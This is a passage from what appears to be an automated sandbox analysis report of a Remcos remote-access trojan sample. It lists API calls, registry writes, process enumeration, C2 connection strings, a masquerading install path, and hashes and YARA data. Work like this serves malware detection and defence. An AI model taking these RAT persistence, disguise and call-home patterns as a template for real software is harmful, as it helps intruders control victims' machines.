                                          • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                          • Part of subcall function 00407E37: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                          • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                          • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                          • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                          • Part of subcall function 00407E37: wcscmp.MSVCRT ref: 00407EE0
                                          • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F0
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F9
                                        • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409210
                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040921B
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409226
                                        • wcscpy.MSVCRT ref: 00409230
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040923F
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040924B
                                        • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409254
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,004140D8,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040926C
                                          • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                          • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                        • ??3@YAXPAX@Z.MSVCRT ref: 00409280
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034,?), ref: 0040929E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004092A7
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(licence), ref: 004092B7
                                          • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                          • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                          • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                          • Part of subcall function 0040B708: RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                          • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                          • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000000D,00415B14), ref: 004092DA
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000028), ref: 0040938A
                                        • atoi.MSVCRT ref: 00409391
                                        • CreateThread.KERNEL32(00000000,00000000,00413B0F,00000000,00000000,00000000), ref: 004093C0
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000F), ref: 004093CD
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004093E1
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000,00000031,00415800), ref: 00409402
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409410
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000011), ref: 00409432
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 00409444
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040945D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409466
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000031), ref: 0040948B
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 0040949D
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004094B8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094C1
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094CA
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041B964,00415A24,00000000,00000011), ref: 004094F4
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(004140D8,00000000,?,00000000,00000011), ref: 00409501
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,00000000,00000011), ref: 0040950D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409516
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 0040951F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409528
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000036,?,?,?,?,00000000,00000011), ref: 00409539
                                        • atoi.MSVCRT ref: 00409540
                                          • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                          • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                          • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                          • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                          • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                          • Part of subcall function 00409A2F: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                          • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                          • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                          • Part of subcall function 00409A2F: CreateToolhelp32Snapshot.KERNEL32 ref: 00409A81
                                          • Part of subcall function 00409A2F: Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                          • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                          • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409ACC
                                          • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                          • Part of subcall function 00409A2F: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                          • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                          • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                          • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                          • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                          • Part of subcall function 00409A2F: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                          • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                          • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                          • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                          • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                          • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000037,?,?,?,00000000,00000011), ref: 00409564
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000011), ref: 0040958C
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000014,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095C2
                                        • ??2@YAPAXI@Z.MSVCRT ref: 004095CF
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000035,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095E5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409814
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$V01@@$?data@?$basic_string@$??0?$basic_string@V01@$??4?$basic_string@$V?$basic_string@$G@2@@0@$Hstd@@$CreateV10@$??8std@@?begin@?$basic_string@?length@?$basic_string@?size@?$basic_string@G@1@@$CloseD@1@@D@2@@0@D@std@@@std@@Process32$??2@?end@?$basic_string@?find@?$basic_string@A?$basic_string@FileModuleMutexNameNextOpenV12@Valueatoimallocwcslen$??0?$basic_ofstream@??3@??6std@@??9std@@?close@?$basic_ofstream@?substr@?$basic_string@D?$basic_ofstream@D@std@@@0@DirectoryErrorFirstG@2@@0@0@HandleLastObjectQuerySingleSnapshotThreadToolhelp32V10@0@V10@@V?$basic_ostream@WaitY?$basic_string@freewcscmpwcscpy
                                        • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe$Inj$Normal$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$[INFO]$exepath$licence$licence_code.txt$origmsc
                                        • API String ID: 1672879135-643311509
                                        • Opcode ID: 9d157c73442bb5af3ebd929e7d9c312b9f2b5bf56f744dd631c919ccb799b7ea
                                        • Instruction ID: 756b6b72303f02f0a44bbd524559c36dcc88ee27c0131fa1ad94d22a553bdc8a
                                        • Opcode Fuzzy Hash: 9d157c73442bb5af3ebd929e7d9c312b9f2b5bf56f744dd631c919ccb799b7ea
                                        • Instruction Fuzzy Hash: 5862C572A00648EBDB057BB0AC599FE3B29EB84305F04447EF502A72D2DF784D458B6C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 00412407: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,73B743E0,0041BCB0,00000000), ref: 00412492
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,73B743E0,0041BCB0,00000000), ref: 0040C83F
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000029), ref: 0040C855
                                        • atoi.MSVCRT ref: 0040C85C
                                        • Sleep.KERNEL32(00000000), ref: 0040C870
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416954,?), ref: 0040C884
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C898
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B50,?), ref: 0040C8CE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C8E5
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Connecting to ,00000000,00000000,00415B50,00000000), ref: 0040C933
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,00000000,00415B50,00000000), ref: 0040C943
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415B50,00000000), ref: 0040C950
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,00000000,?,?,?,?,00415B50,00000000), ref: 0040C961
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C975
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C981
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C99B
                                        • gethostbyname.WS2_32(00000000), ref: 0040C9A2
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C9D7
                                        • atoi.MSVCRT ref: 0040C9DE
                                        • htons.WS2_32(00000000), ref: 0040C9E6
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA10
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA18
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA21
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA3E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Connected to ,00000000,00000000,00415B50,00000000), ref: 0040CA92
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,00000000,00415B50,00000000), ref: 0040CAA2
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415B50,00000000), ref: 0040CAAC
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,00000000,?,?,?,?,00415B50,00000000), ref: 0040CABD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CAD1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CADD
                                        • sprintf.MSVCRT ref: 0040CB14
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B954), ref: 0040CB25
                                        • _itoa.MSVCRT ref: 0040CB37
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000001), ref: 0040CB50
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040CB5D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040CB66
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(name,?,00000104,00000000), ref: 0040CB83
                                          • Part of subcall function 0040B692: RegOpenKeyExA.ADVAPI32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                          • Part of subcall function 0040B692: RegQueryValueExA.ADVAPI32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                          • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(?), ref: 0040CBA5
                                          • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                          • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                          • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                          • Part of subcall function 00409E7D: GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,0041BFB8,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro), ref: 00409E8E
                                          • Part of subcall function 00409E7D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro,0041B310,00000000,0041B310), ref: 00409E9F
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,?), ref: 0040CBCC
                                        • GetTickCount.KERNEL32 ref: 0040CC20
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000,0041B310,00000000,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro,0041B310,00000000), ref: 0040CD07
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD17
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD27
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD37
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,00000000,00000000,0041B310), ref: 0040CD47
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040CD57
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CD67
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CD77
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CD87
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040CD97
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDA7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040CDB7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDC7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDD7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDE7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDF7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE07
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE17
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE27
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE37
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE47
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 0040CE57
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE67
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE77
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE87
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE97
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEA7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040CEB7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEC7
